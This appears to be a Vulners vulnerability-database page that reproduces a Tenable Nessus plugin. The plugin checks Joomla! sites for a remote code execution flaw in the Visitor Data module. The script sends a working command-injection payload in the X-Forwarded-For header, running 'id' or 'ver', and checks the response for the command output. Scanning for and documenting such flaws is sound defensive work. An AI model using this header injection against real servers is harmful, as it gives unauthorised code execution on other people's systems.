Vulners
Lucene search
Visitor Data Module for Joomla! X-Forwarded-For Header RCE
| Source | Link |
|---|---|
| nessus | www.nessus.org/u |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(46332);
script_version("1.18");
script_set_attribute(attribute:"plugin_modification_date", value:"2025/05/14");
script_bugtraq_id(40075);
script_xref(name:"EDB-ID", value:"12574");
script_name(english:"Visitor Data Module for Joomla! X-Forwarded-For Header RCE");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The version of the Visitor Data module for Joomla! running on the
remote host is affected by a remote code execution vulnerability due
to improper sanitization of user-supplied input to the X-Forwarded-For
request header before passing it to the exec() function. An
unauthenticated, remote attacker can exploit this issue to disclose
arbitrary files or execute arbitrary PHP code on the remote host,
subject to the privileges of the web server user ID.");
# http://elotrolad0.blogspot.com/2010/05/modvisitordata-joomla-remoce-code.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?dbf42fff");
script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:U/RC:X");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2010/05/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/05/13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2010-2025 Tenable Network Security, Inc.");
script_dependencies("joomla_detect.nasl", "os_fingerprint.nasl");
script_require_keys("installed_sw/Joomla!", "www/PHP");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");
app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:80, php:TRUE);
install = get_single_install(
app_name : app,
port : port
);
dir = install['path'];
install_url = build_url(port:port, qs:dir);
# The technique used here only gives us access to the last line
# of command output because of the way the PHP code is written.
# It may be possible to get all the output by redirecting command
# output to an open file descriptor, but that's likely requires
# multiple requests and isn't necessarily portable.
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
if ("Windows" >< os) cmd = 'ver';
else cmd = 'id';
cmds = make_list(cmd);
}
else cmds = make_list('id', 'ver');
cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats['ver'] = "Windows \[Version [0-9]";
# Try to exploit the issue to run a command.
foreach cmd (cmds)
{
magic = substr(SCRIPT_NAME, 0, strlen(SCRIPT_NAME)-6) + '-' + unixtime();
if ('ver' == cmd) exploit = magic + ' & ' + cmd + ' & rem ';
else exploit = '--version ' + magic + '; (echo -n "netname ";' + cmd + ');1';
res = http_send_recv3(
port : port,
method : "GET",
item : dir + '/index.php',
add_headers : make_array(
"X-Forwarded-For", exploit
),
exit_on_fail : TRUE
);
# Unless we're paranoid, make sure the affected module is installed.
if (
report_paranoia < 2 &&
res[2] &&
'<h3>Visitor Data</h3>' >!< res[2] &&
'.gif" width="18" height="12"' >!< res[2]
) audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, "Visitor Data module");
# There's a problem if we see the expected command output.
if (egrep(pattern:cmd_pats[cmd], string:res[2]))
{
output = strstr(res[2], '<h3>Visitor Data</h3>');
output = strstr(output, '.gif" width="18" height="12"');
output = strstr(output, '" /> : ') - '" /> : ';
output = output - strstr(output, '<br/><strong>');
if(empty_or_null(output)) output = res[2];
if ('ver' == cmd)
rep_extra = 'Note that the first 9 characters of the output are filtered out by' + '\nthe script';
else rep_extra = NULL;
security_report_v4(
port : port,
severity : SECURITY_HOLE,
cmd : cmd,
request : make_list(http_last_sent_request()),
output : chomp(output),
rep_extra : rep_extra
);
exit(0);
}
}
audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, "Visitor Data module");
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 May 2025 00:00Current
6.9Medium risk
Vulners AI Score6.9